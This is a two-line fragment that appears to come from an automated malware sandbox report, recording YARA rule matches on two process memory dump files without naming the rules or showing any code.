Source: Yara match	File source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY